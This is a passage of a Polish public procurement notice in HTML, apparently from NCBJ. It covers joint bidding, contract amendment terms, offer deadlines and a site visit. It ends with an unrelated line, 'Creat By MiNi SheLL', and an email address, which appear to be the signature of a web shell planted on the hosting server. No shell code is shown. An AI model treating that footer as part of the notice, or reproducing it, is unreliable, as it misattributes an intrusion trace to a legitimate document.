spełnianie warunków udziału w postępowaniu Wykonawcy<br/>wykazują zgodnie z pkt 8.2. IDW.<br/>13.3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym<br/>mowa w pkt. 10.2 IDW składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu<br/>W przypadku, gdy spełnienie warunku opisanego:<br/>1) w pkt. 8.2 IDW wykazuje co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia<br/>2) w pkt. 8.2 IDW wykonawcy wykazują poprzez poleganie na zdolnościach tych z wykonawców, którzy<br/>wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>wykonawcy wspólnie ubiegający się o udzielenie zamówienia oświadczają , które, dostawy lub<br/>usługi wykonają poszczególni wykonawcy.<br/>13.5. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani na<br/>wezwanie Zamawiającego złożyć aktualne na dzień złożenia podmiotowe środki dowodowe, o których<br/>mowa w pkt 10 IDW, przy czym:<br/>1) podmiotowe środki dowodowe o których mowa w pkt 10.8. IDW składa odpowiednio<br/>Wykonawca/Wykonawcy, który/którzy wykazuje/ą spełnianie warunku, w zakresie i na zasadach<br/>opisanych w pkt 8.2 IDW;<br/>2) dokumenty i oświadczenia o których mowa w pkt 10.2. IDW składa każdy z nich. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Poza przypadkami określonymi w art. 455 ust. 1 pkt 2, 3 i 4 oraz ust. 2 Pzp, Zamawiający przewiduje możliwość<br/>dokonania zmian w Umowie w stosunku do treści Oferty Wykonawcy, na warunkach, o których mowa w niniejszym<br/>paragrafie.<br/>2. Dopuszcza się wprowadzenie istotnych zmian do Umowy w następującym zakresie:<br/>1) przedmiotu Umowy lub/i Wynagrodzenia:<br/>a) w przypadku konieczności wykonania Robót lub usunięcia wad w celu zmniejszenia zagrożenia, gdy istnieje przypadek<br/>wpływający na bezpieczeństwo życia, zdrowia, mienia lub Robót na terenie prac a Zamawiający wydał Wykonawcy<br/>Polecenie wykonania robót lub innych czynności w celu wyeliminowania lub zmniejszenia zagrożenia,<br/>2) terminu realizacji Umowy:<br/>a) zmian Prawa mających wpływ na Termin wykonania Robót lub sposób prowadzenia Robót,<br/>b) wstrzymania Robót lub przerwy w ich realizacji, z przyczyn zależnych od Zamawiającego – o czas trwania wstrzymania<br/>lub przerwy w ich realizacji,<br/>c) zlecenia przez Zamawiającego prac lub robót zamiennych lub dodatkowych, jeżeli terminy ich zlecenia, rodzaj lub zakres<br/>uniemożliwiają dotrzymanie pierwotnego terminu umownego – o czas potrzebny na zrealizowanie robót dodatkowych i<br/>odpowiedniej zmiany czasu zakresu podstawowego, wykraczający poza pierwotny termin umowny,<br/>d) wystąpienia Siły wyższej,<br/>e) w przypadku nałożenia ograniczeń związanych z działaniem koronawirusa (wirusa SARS-CoV-2), przejawiających się<br/>jako epidemia, pandemia lub kwarantanna, wojną<br/>na Ukrainie, gdy ich zakres będzie większy niż zakres zaobserwowany w dniu podpisania Umowy, lub zakłóceniem<br/>łańcucha dostaw - jeżeli będą one miały rzeczywisty wpływ na realizację Umowy. Zakres ograniczeń zostanie określony i<br/>porównany do stanu z dnia podpisania Umowy.<br/>f) zastosowania innej technologii wykonania Robót spowodowanej w szczególności: wojną na Ukrainie, niedostępnością lub<br/>znacznym utrudnieniem pozyskania na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej, wycofania<br/>z rynku tych materiałów lub urządzeń lub innym zakłóceniem łańcucha dostaw, pojawieniem się na rynku materiałów lub<br/>urządzeń nowszej generacji, pojawieniem się nowszej technologii wykonania zaprojektowanych Robót pozwalającej na<br/>zaoszczędzenie czasu realizacji inwestycji, jak również kosztów eksploatacji wykonanego przedmiotu Umowy – adekwatnie<br/>do wpływu zmiany wykorzystywanej technologii na termin realizacji robót poprzez jego skrócenie,<br/>3. W przypadkach określonych w niniejszym paragrafie, Wykonawca jest zobowiązany<br/>do powiadomienia Zamawiającego w terminie 14 dni od zaistnienia tych okoliczności i ich wpływie na Harmonogram lub<br/>Koszt realizacji przedmiotu Umowy. Zamawiający jest zobowiązany do przedstawienia stanowiska w przedmiotowej sprawie<br/>w terminie 21 dni od otrzymania powiadomienia Wykonawcy lub uzupełnienia dokumentów. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-09-19 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/ncbj</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-09-19 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-10-18</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> cena i okres gwarancji zgodnie z zapisami Tom I SWZ <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający dopuszcza możliwość odbycia wizji lokalnej przez Wykonawcę.<br/>1) Uczestnictwo w wizji nie jest obowiązkowe.<br/>2) Udział w wizji wymaga wcześniejszego zgłoszenia poprzez Platformę zakupową<br/>https://platformazakupowa.pl/pn/ncbj i Formularz „Wyślij wiadomość”, w celu uzyskania<br/>przepustki. Do wejścia na teren NCBJ konieczne jest posiadanie dokumentu potwierdzającego<br/>tożsamość osób biorących udział w wizji.<br/>3) Zamawiający wyznacza termin odbycia wizji lokalnej: w dniu 10.09.2025 r. o godz. 10.00<br/>4) Do wejścia na teren NCBJ konieczne jest uzyskanie przepustki i posiadanie dokumentu<br/>potwierdzającego tożsamość osób biorących udział w wizji.<br/>5) W celu wyrobienia przepustki konieczne jest przekazanie wykazu osób, które będą uczestniczyć w<br/>wizji wraz z podaniem danych: imię i nazwisko, nr dowodu osobistego, które należy przesłać do<br/>Zamawiającego za pośrednictwem platformazakupowa.pl https://platformazakupowa.pl/pn/ncbj i<br/>formularza „Wyślij wiadomość do zamawiającego”.<br/>6) Po odbyciu wizji lokalnej konieczne jest podpisanie protokołu potwierdzającego uczestnictwo w wizji<br/>lokalnej.<br/>2. Wszelkie szczegółowe informacje dotyczące niniejszego postępowania zawarte są w SWZ Tom I-III, która jest dostępna<br/>pod<br/>adresem:<br/>http://platformazakupowa.pl/pn/ncbj<br/>Wykonawca może zwrócić się do Zamawiającego z wnioskiem o wyjaśnienie treści SWZ.<br/>Wniosek należy przesłać za pośrednictwem Platformy w zakładce „Pytania/informacje”.

Creat By MiNi SheLL
Email: jattceo@gmail.com